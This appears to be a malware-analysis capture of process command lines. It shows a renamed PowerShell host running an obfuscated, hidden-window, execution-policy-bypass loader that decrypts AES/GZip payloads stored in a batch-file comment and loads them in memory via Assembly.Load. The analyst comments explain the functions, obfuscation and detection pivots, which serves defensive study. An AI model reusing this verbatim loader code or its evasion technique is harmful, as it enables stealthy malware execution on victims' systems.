cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "UlbnQhboLBuL" C:\Users\test22\AppData\Local\Temp\Uni.bat
# Captured process command line (kept verbatim below). The leading "3020" is presumably the PID
# column of the preceding cmd.exe row fused onto this row's image name -- TODO confirm against the
# original report layout.
#
# Launch context: the image is named Uni.bat.exe but receives PowerShell host switches
# (-noprofile, -windowstyle hidden, -ep bypass, -command), so it is presumably a renamed copy of
# the PowerShell host -- verify via file hash or the PE OriginalFileName field.
#
# String obfuscation: .NET method names are built at run time by reversing literals with
# [-1..-N] -join '':
#   'gnirtS46esaBmorF' -> FromBase64String, 'daoL' -> Load, 'txeTllAdaeR' -> ReadAllText.
# A plain search for those API names in the command line therefore misses them; match on the
# reversed literals or on the [-1..-N] -join '' idiom as well.
#
# Inline script, in order of definition:
#   BgRxE($XUBfu)         AES-decrypts a byte array. CBC mode, PKCS7 padding; key and IV are the
#                         Base64 literals embedded in the command line (they decode to 32 and 16 bytes).
#   mliMM($XUBfu)         GZip-decompresses a byte array through MemoryStreams and returns the bytes.
#   WbAdc($XUBfu,$ghXXD)  Passes the byte array to Assembly.Load (the byte[] overload, so the assembly
#                         comes from memory, not from a file path) and invokes its EntryPoint with
#                         $ghXXD as the argument list.
#
# Main flow:
#   1. Reads C:\Users\test22\AppData\Local\Temp\Uni.bat as text and splits it on newlines.
#   2. Takes the first line that starts with ':: ' (a batch-file comment line), drops that 3-character
#      prefix and splits the remainder on '\' into two Base64 blobs.
#   3. Each blob goes through Base64 decode -> BgRxE (AES) -> mliMM (GZip).
#   4. The assembly from blob [1] is invoked first, then the one from blob [0], each with a single
#      empty-string argument.
#
# Analysis notes: because the key and IV are recorded in the command line, both blobs can be decrypted
# and decompressed offline from a copy of Uni.bat for static analysis. Useful detection pivots visible
# here are the hidden-window plus execution-policy-bypass switch pair on a non-standard image name, a
# script reading its own launcher .bat from a Temp directory, and reflective assembly loading from a
# byte array; PowerShell script block logging, where enabled, records the script text for review.
3020Uni.bat.exe "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function BgRxE($XUBfu){ $yHyZa=[System.Security.Cryptography.Aes]::Create(); $yHyZa.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yHyZa.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yHyZa.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7MymoDIuie4tPVsKnVHec+BUrxddCyMvAJR/EwsbVTs='); $yHyZa.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6Jj5qajjJfogZ5gJA2HV7Q=='); $Urbyf=$yHyZa.CreateDecryptor(); $return_var=$Urbyf.TransformFinalBlock($XUBfu, 0, $XUBfu.Length); $Urbyf.Dispose(); $yHyZa.Dispose(); $return_var;}function mliMM($XUBfu){ $vcQqJ=New-Object System.IO.MemoryStream(,$XUBfu); $OYxgY=New-Object System.IO.MemoryStream; $Pmwqm=New-Object System.IO.Compression.GZipStream($vcQqJ, [IO.Compression.CompressionMode]::Decompress); $Pmwqm.CopyTo($OYxgY); $Pmwqm.Dispose(); $vcQqJ.Dispose(); $OYxgY.Dispose(); $OYxgY.ToArray();}function WbAdc($XUBfu,$ghXXD){ $oXpAu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$XUBfu); $chWYo=$oXpAu.EntryPoint; $chWYo.Invoke($null, $ghXXD);}$EsBfp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\test22\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($yNUfS in $EsBfp) { if ($yNUfS.StartsWith(':: ')) { $xivcY=$yNUfS.Substring(3); break; }}$ofSbM=[string[]]$xivcY.Split('\');$UxsLS=mliMM (BgRxE ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ofSbM[0])));$IoyMQ=mliMM (BgRxE ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ofSbM[1])));WbAdc $IoyMQ (,[string[]] (''));WbAdc $UxsLS (,[string[]] (''));
2368